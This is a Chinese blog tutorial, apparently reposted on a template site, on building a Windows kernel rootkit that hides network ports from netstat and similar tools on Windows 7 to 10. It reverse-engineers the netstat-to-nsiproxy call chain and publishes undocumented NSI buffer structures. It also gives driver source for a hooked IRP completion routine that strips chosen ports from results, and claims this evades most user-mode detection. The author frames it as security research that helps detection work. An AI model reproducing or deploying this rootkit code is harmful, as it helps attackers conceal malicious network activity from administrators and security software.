Rookit系列一 【隐藏网络端口】【支持Win7 x32/x64 ~ Win10 x32/x64】

这篇具有很好参考价值的文章主要介绍了Rookit系列一 【隐藏网络端口】【支持Win7 x32/x64 ~ Win10 x32/x64】。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Rookit系列一 【隐藏网络端口】【支持Win7 x32/x64 ~ Win10 x32/x64】

前言

Rookit是个老生常谈的话题了,它包括隐藏进程、隐藏模块、隐藏端口等隐藏技术和其他对抗杀软的技术。作为一名二进制安全研究员你可以不去写这些代码,但你不能不懂,也因为最近隔壁组的同事在做这方面的检测向我请教了一些问题,索性我就利用空余时间研究了一下网络端口的隐藏。

网上随便去搜搜隐藏端口的资料,发现能用的几乎没有。 这才是我研究的动力和分享的意义。 \textcolor{green}{这才是我研究的动力和分享的意义。} 这才是我研究的动力和分享的意义。于是就自己研究了一通,发现也没什么特别的。

本篇分享的隐藏端口方法可过绝大部分应用层软件的检测 \textcolor{Red}{本篇分享的隐藏端口方法可过绝大部分应用层软件的检测} 本篇分享的隐藏端口方法可过绝大部分应用层软件的检测

探究隐藏网络端口

netstat分析

这一切还得从netstat工具开始说起,相信很多人都用过这款工具来查看系统建立的所有网络连接信息。我常用的方式:

netstat -a

为了弄明白这款工具的工作原理,我对其进行了简单地逆向分析。

首先netstat会调用 I n i t S n m p \textcolor{cornflowerblue}{InitSnmp} InitSnmp函数初始化一些需要用到的函数

DWORD __stdcall InitSnmp()
{
...

  v8 = _time(0);
  if ( !GetSystemDirectoryA(Buffer, 0x104u) )
    return GetLastError();
  v1 = &Buffer[strlen(Buffer)];
  if ( verbose )
  {
    if ( StringCbCopyA(v1, (char *)&v10 - v1, "\\mgmtapi.dll") < 0 )
      return 8;
    LibraryA = LoadLibraryA(Buffer);
    if ( LibraryA )
      pSnmpMgrOidToStr = (int)GetProcAddress(LibraryA, "SnmpMgrOidToStr");
  }
  if ( StringCbCopyA(v1, (char *)&v10 - v1, "\\inetmib1.dll") < 0 )
    return 8;
  v3 = LoadLibraryA(Buffer);
  v4 = v3;
  if ( !v3 )
    return 2;
  gInitAddr = (int (__stdcall *)(_DWORD, _DWORD, _DWORD))GetProcAddress(v3, "SnmpExtensionInit");
  if ( !gInitAddr )
    return 2;
  gQueryAddr = (int)GetProcAddress(v4, "SnmpExtensionQuery");
  if ( !gQueryAddr )
    return 2;
  gInitAddr(v8, v7, v6);
  return 0;
}

然后调用 i n e t m i b 1 ! S n m p E x t e n s i o n I n i t \textcolor{cornflowerblue}{inetmib1!SnmpExtensionInit} inetmib1!SnmpExtensionInit,内部会调用 i n e t m i b 1 U ! p d a t e C a c h e \textcolor{cornflowerblue}{inetmib1U!pdateCache} inetmib1U!pdateCache

int __stdcall UpdateCache(int a1)
{
  int v2; // [esp+10h] [ebp-1Ch]

  RtlAcquireResourceExclusive(&g_LockTable + a1, 1u);
  if ( g_dwLastUpdateTable[a1] && GetTickCount() - g_dwLastUpdateTable[a1] < g_dwTimeoutTable[a1] )
    goto LABEL_6;
  v2 = g_pfnLoadFunctionTable[a1]();	// 根据传进来的参数为1可以知道将会调用的函数是LoadIfTable
  if ( !v2 )
  {
    g_dwLastUpdateTable[a1] = GetTickCount();
LABEL_6:
    v2 = 0;
    goto LABEL_7;
  }
  g_dwLastUpdateTable[a1] = 0;
LABEL_7:
  RtlReleaseResource(&g_LockTable + a1);
  return v2;
}
int __stdcall LoadIfTable()
{
  int result; // eax

  if ( lpMem )
  {
    HeapFree(g_hPrivateHeap, 0, lpMem);
    lpMem = 0;
  }
  if ( dword_3F4C708 )
  {
    NsiFreeTable(dword_3F4C708, dword_3F4C70C, dword_3F4C710, dword_3F4C714);
    dword_3F4C708 = 0;
    dword_3F4C70C = 0;
    dword_3F4C710 = 0;
    dword_3F4C714 = 0;
    dword_3F4C718 = 0;
  }
  result = InternalGetIfTable(&lpMem, g_hPrivateHeap, 0);
  if ( !result )
    return NsiAllocateAndGetTable(
             1,
             &NPI_MS_NDIS_MODULEID,
             0,
             &dword_3F4C708,
             8,
             &dword_3F4C70C,
             0x440,
             &dword_3F4C710,
             0xD8,
             &dword_3F4C714,
             0x258,
             &dword_3F4C718,
             0);
  return result;
}

其中最关键的就是函数 N s i A l l o c a t e A n d G e t T a b l e \textcolor{cornflowerblue}{NsiAllocateAndGetTable} NsiAllocateAndGetTable,实际调用的是导入函数 N S I ! N s i A l l o c a t e A n d G e t T a b l e \textcolor{cornflowerblue}{NSI!NsiAllocateAndGetTable} NSI!NsiAllocateAndGetTable,接着调用 N S I ! N s i E n u m e r a t e O b j e c t s A l l P a r a m e t e r s E x \textcolor{cornflowerblue}{NSI!NsiEnumerateObjectsAllParametersEx} NSI!NsiEnumerateObjectsAllParametersEx去往内核。

int __stdcall NsiEnumerateObjectsAllParametersEx(PVOID InputBuffer)
{
  DWORD BytesReturned; // [esp+0h] [ebp-4h] BYREF

  BytesReturned = 0x3C;
  return NsiIoctl(0x12001Bu, InputBuffer, 0x3Cu, InputBuffer, &BytesReturned, 0);
}


ULONG __stdcall NsiIoctl(
        ULONG IoControlCode,
        PVOID InputBuffer,
        ULONG InputBufferLength,
        PVOID OutputBuffer,
        LPDWORD lpBytesReturned,
        LPOVERLAPPED lpOverlapped)
{
...

  result = NsiOpenDevice(1);
  if ( result )
    return result;
  v7 = *lpBytesReturned;
  if ( lpOverlapped )
  {
    if ( DeviceIoControl(
           g_NsiAsyncDeviceHandle,
           IoControlCode,
           InputBuffer,
           InputBufferLength,
           OutputBuffer,
           v7,
           lpBytesReturned,
           lpOverlapped) )
    {
      return 0;
    }
    return GetLastError();
  }
...
}

接收 N S I ! N s i I o c t l \textcolor{cornflowerblue}{NSI!NsiIoctl} NSI!NsiIoctl发出的控制码并处理是在 n s i p r o x y ! N s i p p D i s p a t c h D e v i c e C o n t r o l \textcolor{cornflowerblue}{nsiproxy!NsippDispatchDeviceControl} nsiproxy!NsippDispatchDeviceControl

int __stdcall NsippDispatchDeviceControl(PIRP pIrp, _IO_STACK_LOCATION *Iostk)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  MasterIrp = pIrp->AssociatedIrp.MasterIrp;
  RequestorMode = pIrp->RequestorMode;
  p_Information = &pIrp->IoStatus.Information;
  pIrp->IoStatus.Information = 0;
  LOBYTE(pIrp) = RequestorMode;
  LowPart = Iostk->Parameters.Read.ByteOffset.LowPart;
  Options = Iostk->Parameters.Create.Options;
  Irqla = (unsigned __int8)MasterIrp;
  Parameters = Iostk->Parameters.CreatePipe.Parameters;
  if ( LowPart <= 0x120023 )
  {
    if ( LowPart == 0x120023 )
      return NsippDeregisterChangeNotification((KIRQL)Parameters, Options, (char)pIrp, (int)Iostk);
    v10 = LowPart - 0x120007;
    if ( !v10 )
      return NsippGetParameter(Parameters, Options, (char)pIrp, (int)p_Information);
    v11 = v10 - 4;
    if ( !v11 )
      return NsippSetParameter(Parameters, Options, (char)pIrp);
    v12 = v11 - 4;
    if ( !v12 )
      return NsippGetAllParameters(Parameters, Options, (char)pIrp, (int)p_Information);
    v13 = v12 - 4;
    if ( !v13 )
      return NsippSetAllParameters((KIRQL)Parameters, (PKSPIN_LOCK)Options, (char)pIrp, (int)Iostk);
    v14 = v13 - 8;
    if ( !v14 )                                 // 0x12001Bu
      return NsippEnumerateObjectsAllParameters(Parameters, Options, (int)pIrp, p_Information); // 枚举所有网络连接的参数
    if ( v14 == 4 )
      return NsippRegisterChangeNotification(Parameters, Options, (char)pIrp, (int)Iostk, (int)p_Information);
    return 0xC0000002;
  }
  v16 = LowPart - 0x12003F;
  if ( !v16 )
    return NsippRequestChangeNotification((PKSPIN_LOCK)pIrp, (KIRQL)Parameters, Options, (KIRQL)pIrp);
  v17 = v16 - 1;
  if ( !v17 )
    return NsippCancelChangeNotification(Irqla, Options);
  v18 = v17 - 7;
  if ( !v18 )
    return NsippEnumerateObjectsAllPersistentParametersWithMask(Parameters, Options, (char)pIrp, (int)p_Information);
  v19 = v18 - 4;
  if ( !v19 )
    return NsippGetAllPersistentParametersWithMask(Parameters, Options, (char)pIrp, (int)p_Information);
  if ( v19 != 4 )
    return 0xC0000002;
  return NsippSetAllPersistentParametersWithMask(Parameters, Options, (char)pIrp, (int)p_Information);
}

现在总结一下netstat的主要调用链:

n e t s t a t ! I n i t S n m p   − >   i n e t m i b 1 ! S n m p E x t e n s i o n I n i t   − >   i n e t m i b 1 ! U p d a t e C a c h e   − > i n e t m i b 1 ! _ L o a d I f T a b l e   − >   N S I ! N s i A l l o c a t e A n d G e t T a b l e   − > \textcolor{orange}{netstat!InitSnmp\ ->\ inetmib1!SnmpExtensionInit\ -> \ inetmib1!UpdateCache\ -> inetmib1!\_LoadIfTable\ -> \ NSI!NsiAllocateAndGetTable\ ->} netstat!InitSnmp > inetmib1!SnmpExtensionInit > inetmib1!UpdateCache >inetmib1!_LoadIfTable > NSI!NsiAllocateAndGetTable >

  N S I ! N s i E n u m e r a t e O b j e c t s A l l P a r a m e t e r s   − > N S I ! N s i E n u m e r a t e O b j e c t s A l l P a r a m e t e r s E x   − >   n s i p r o x y ! N s i p p E n u m e r a t e O b j e c t s A l l P a r a m e t e r s \textcolor{orange}{\ NSI!NsiEnumerateObjectsAllParameters\ -> NSI!NsiEnumerateObjectsAllParametersEx\ ->\ nsiproxy!NsippEnumerateObjectsAllParameters}  NSI!NsiEnumerateObjectsAllParameters >NSI!NsiEnumerateObjectsAllParametersEx > nsiproxy!NsippEnumerateObjectsAllParameters

隐藏网络端口的原理

nsiproxy.sys驱动创建的设备对象叫\Device\Nsi,我们可以HOOK它的设备IO控制派遣函数,过滤控制码0x12001B,替换原设备处理该控制码的完成例程。在我们的完成例程中解析数据,抹掉我们的目标数据就能够实现端口隐藏了。

然后最最最关键的地方来了,就是如何解析数据,他的数据结构是什么?我想这才是网上几乎没有可用的源码的原因了吧。在win7之前尚且有人发过可用的源码,而win7及其以后的系统中就没有可用的源码了。倒不是因为这个技术行不通了,而是没人去分析它的数据结构了,也或者研究的人并不打算放出来。

那么今天我将重新分析并给出其结构,我想这应该是全网仅此一家了吧。希望看到这的帅哥美女能够给我点个赞,毕竟研究不易。 \textcolor{green}{那么今天我将重新分析并给出其结构,我想这应该是全网仅此一家了吧。希望看到这的帅哥美女能够给我点个赞,毕竟研究不易。} 那么今天我将重新分析并给出其结构,我想这应该是全网仅此一家了吧。希望看到这的帅哥美女能够给我点个赞,毕竟研究不易。

关键数据结构

typedef struct _NET_INFO
{
	USHORT Type;            		// +0x00
	USHORT lPort;           		// +0x02
	ULONG lHost;            		// +0x04
	char Reserved1[0x16];   		// +0x08
	USHORT rPort;           		// +0x1E
	ULONG rHost;            		// +0x20
	char Reserved2[0x14];   		// +0x24
}NET_INFO, * PNET_INFO;       	// Total:0x38

typedef struct _PROC_INFO {
	ULONG Reserved1[3];				// +0x00
	ULONG OwnerPid;					// +0x0C
	LARGE_INTEGER CreateTimestamp;	// +0x10
	ULONGLONG OwningModuleInfo;		// +0x18
}PROC_INFO, * PPROC_INFO;				// Total:0x20

typedef struct _STATE_INFO
{
	ULONG State;						// +0x00
	ULONG Reserved1;					// +0x04
	LARGE_INTEGER CreateTimestamp;	// +0x08
}STATE_INFO, * PSTATE_INFO;			// Total:0x10

// nsiproxy缓冲区inBuffer/outBuffer布局:
typedef struct _MIB_PARAMX32
{
	ULONG Unk_0;						// +0x00
	ULONG Unk_1;						// +0x04
	ULONG* POINTER_32 ModuleId;		// +0x08
	ULONG dwType;					// +0x0C
	ULONG Unk_2;						// +0x10
	ULONG Unk_3;						// +0x14
	VOID* POINTER_32 NetInfo;			// +0x18
	ULONG NetInfoSize;				// +0x1C
	VOID* POINTER_32 outBuffer;		// +0x20
	ULONG outBufferSize;				// +0x24
	VOID* POINTER_32 StateInfo;		// +0x28
	ULONG StateInfoSize;				// +0x2C
	VOID* POINTER_32 ProcInfo;		// +0x30
	ULONG ProcInfoSize;				// +0x34
	ULONG ConnectCounts;				// +0x38
}MIB_PARAMX32, * PMIB_PARAMX32;		// Total:0x3C

typedef struct _MIB_PARAMX64
{
	ULONG64 Unk_0;					// +0x00
	ULONG* ModuleId;					// +0x08
	ULONG64 dwType;					// +0x10
	ULONG64 Unk_2;					// +0x18
	ULONG64 Unk_3;					// +0x20
	PVOID NetInfo;					// +0x28
	ULONG64 NetInfoSize;				// +0x30
	PVOID outBuffer;					// +0x38
	ULONG64 outBufferSize;			// +0x40
	PVOID StateInfo;					// +0x48
	ULONG64 StateInfoSize;			// +0x50
	PVOID ProcInfo;					// +0x58
	ULONG64 ProcInfoSize;				// +0x60
	ULONG64 ConnectCounts;			// +0x68
}MIB_PARAMX64, * PMIB_PARAMX64;		// Total:0x70

隐藏网络端口源码

为防止script kid直接拿来用,源码只放出最关键部分,其余部分还需各位帅哥美女自己完善~文章来源地址https://www.toymoban.com/news/detail-635812.html

NTSTATUS IoCompletionRoutine(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp, IN PVOID Context) {
	PHOOK_IO_COMPLETION hookContext;
	PIO_COMPLETION_ROUTINE OriginalCompletion;
	PNET_INFO pNetInfo = NULL;

	hookContext = (PHOOK_IO_COMPLETION)Context;
	OriginalCompletion = hookContext->OriginalCompletion;

	PIO_STACK_LOCATION irpspNext = IoGetNextIrpStackLocation(Irp);

	if (!NT_SUCCESS(Irp->IoStatus.Status))
	{
		goto free_exit;
	}

#ifdef _WIN64
	if (IoIs32bitProcess(NULL))
	{
#endif
		PMIB_PARAMX32 pNsiParam = (PMIB_PARAMX32)Irp->UserBuffer;
		if (pNsiParam->NetInfoSize == sizeof(NET_INFO))
		{
			if (MmIsAddressValid(pNsiParam->NetInfo))
			{
				pNetInfo = (PNET_INFO)pNsiParam->NetInfo;

				for (ULONG i = 0; i < pNsiParam->ConnectCounts;)
				{
					// 这里默认隐藏80和443端口
					if (htons(pNetInfo[i].lPort) == 80 ||
						htons(pNetInfo[i].lPort) == 443 ||
						htons(pNetInfo[i].rPort) == 80 ||
						htons(pNetInfo[i].rPort) == 443)
					{
						if (i < pNsiParam->ConnectCounts - 1)
						{
							for (ULONG j = i; j < pNsiParam->ConnectCounts - 1; j++)
							{
								// 从此开始将后面的数据向前移动,覆盖当前位置的数据,达到隐藏目的
								RtlCopyMemory(&pNetInfo[j], &pNetInfo[j + 1], sizeof(NET_INFO));
							}
						}
						else
						{
							RtlZeroMemory(&pNetInfo[i], sizeof(NET_INFO));
						}
						// 记得将总的连接数减去1,因为已经隐藏了一个
						pNsiParam->ConnectCounts -= 1;
					}
					else
					{
						i++;
					}
				}
			}
		}
#ifdef _WIN64
	}
	else
	{
		PMIB_PARAMX64 pNsiParam = (PMIB_PARAMX64)Irp->UserBuffer;
		if (pNsiParam->NetInfoSize == sizeof(NET_INFO))
		{
			if (MmIsAddressValid(pNsiParam->NetInfo))
			{
				pNetInfo = (PNET_INFO)pNsiParam->NetInfo;

				for (ULONG i = 0; i < pNsiParam->ConnectCounts;)
				{
					// 这里默认隐藏80和443端口
					if (htons(pNetInfo[i].lPort) == 80 ||
						htons(pNetInfo[i].lPort) == 443 ||
						htons(pNetInfo[i].rPort) == 80 ||
						htons(pNetInfo[i].rPort) == 443)
					{
						if (i < pNsiParam->ConnectCounts - 1)
						{
							for (ULONG j = i; j < pNsiParam->ConnectCounts - 1; j++)
							{
								// 从此开始将后面的数据向前移动,覆盖当前位置的数据,达到隐藏目的
								RtlCopyMemory(&pNetInfo[j], &pNetInfo[j + 1], sizeof(NET_INFO));
							}
						}
						else
						{
							RtlZeroMemory(&pNetInfo[i], sizeof(NET_INFO));
						}
						// 记得将总的连接数减去1,因为已经隐藏了一个
						pNsiParam->ConnectCounts -= 1;
					}
					else
					{
						i++;
					}
				}
			}
		}
	}
#endif

free_exit:

	irpspNext->Context = hookContext->OriginalContext;
	irpspNext->CompletionRoutine = hookContext->OriginalCompletion;

	ExFreePoolWithTag(Context, MY_MEMORY_TAG);

	if (hookContext->bShouldInvolve)
	{
		return (OriginalCompletion)(DeviceObject, Irp, NULL);
	}
	else
	{
		if (Irp->PendingReturned) {
			IoMarkIrpPending(Irp);
		}
		return STATUS_SUCCESS;
	}

}

效果演示

到了这里,关于Rookit系列一 【隐藏网络端口】【支持Win7 x32/x64 ~ Win10 x32/x64】的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 64位WIN7系统下无法安装驱动/ 有黄色感叹号怎么办?

    无法安装驱动的64位Windows7系统,下载并安装微软安全补丁即可: Microsoft Update Catalog 2019-适用于 Windows 7 的 09 安全更新,适合基于 x64 的系统 (KB4474419) 或者: Microsoft Update Catalog  基于 x64 的系统的 Windows 7 安全更新程序 (KB3033929) 原因: 部分64位Windows7系统无法安装驱动,查看设

    2024年02月08日
    浏览(42)
  • 支持win7的VSCode版本最高1.70.3

    最新的VSCode已经不支持WIN7,目前VSCode官网上写的最低支持WIN8. 经过确认,最后支持WIN7的版本是1.70.3,不论32位还是64位,都是这个版本*

    2024年02月16日
    浏览(51)
  • LABVIEW 虚拟键盘 触摸键盘 中英文输入 支持WIN10 WIN7

       当labview打包后在工业触摸电脑上运行,一旦需要修改参数,便有一个头疼的问题:     1、要么接键盘鼠标,那么便失去了触屏的优势,设备或仪器结构也不够简洁美观;     2、要么使用系统自带虚拟键盘,键盘有时会盖住需要输入的地方,盲输键码,那个使用体验就不

    2024年02月10日
    浏览(40)
  • win7 sp1 x64 离线安装.net framework 4.6.1

    在线安装vs2019出现如下问题,然后在线下载 .net framework 总是失败,具体如下图: 系统软硬件环境: win7 旗舰版 sp1 x64 ;威强工控机 4G内存 。  然后去微软网站下载 .net framework 。 https:// support.microsoft.com/zh-cn/topic/%E7%94%A8%E4%BA%8E-windows-7-sp1-%E7%9A%84-net-framework-4-6-1-%E5%92%8C%E5%85

    2024年02月11日
    浏览(41)
  • Win7环境64win操作系统,安装microsoft office2010 时MSXML版本6.10.1129.0,无法安装的解决办法

    ** 第一步 :在百度搜索MSXML6.10.1129.0软件进行下载,大概就是5M左右的大小,下载后解压,选择 第二项进行安装。 第二步: 按照https://mip.win7zhijia.cn/jiaocheng/win7_41377.html进行修改注册表。 但是往往按照以上步骤修改完注册表后还是不能正常安装。 原因是修改注册表时出错,如

    2024年02月12日
    浏览(73)
  • 怎么网络重置?win7怎么网络重置?

    很多用户使用win7的时候如果遇到了网络问题,通常不需要大费周章的设置网络,用户们只需要进入Internet的设置中进行操作,重置一下网络的设置的话一般就可以解决大部分的网络问题。 win7怎么进行网络重置? 1、首先在桌面中点击并进入到“控制面板”。 2、接着在“控制

    2024年02月12日
    浏览(34)
  • win7 诊断并修复网络的七个步骤

    Windows 7新增了一项自动诊断并修复计算机问题的功能,这个功能对于电脑菜鸟来说无疑是雪中送炭,以下笔者以网络问题作为演示。 Windows 7诊断并修复网络问题的步骤: 1、单击“开始”菜单,弹出的窗口单击“控制面板” 2、在控制面板中找到并打开“疑难解答” 3、在“网

    2024年02月07日
    浏览(81)
  • Python&aconda系列:史上最全最详细的Anaconda安装教程(win7版本)

    Anaconda包括Conda、Python以及一大堆安装好的工具包,比如:numpy、pandas等 因此安装Anaconda的好处主要为以下几点: 1)包含conda:conda是一个环境管理器,其功能依靠conda包来实现,该环境管理器与pip类似,那有童鞋会问了:我能通过pip装conda包达到conda环境管理器一样的功能吗?

    2024年02月20日
    浏览(53)
  • Win7无线网络无法连接的原因以及解决办法

    有网友给小编反应大家无线网络无法连接导致联网连不上去,这种情况很多是网友的设置出了问题,那是一些小白朋友不会将无线网络的端口给关闭掉了原因,那么小编就来讲解 无线网络无法连接的解决方法 吧。就以win7系统为例吧。 具体操作方法如下: 1、首先要查看无线

    2024年02月05日
    浏览(61)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包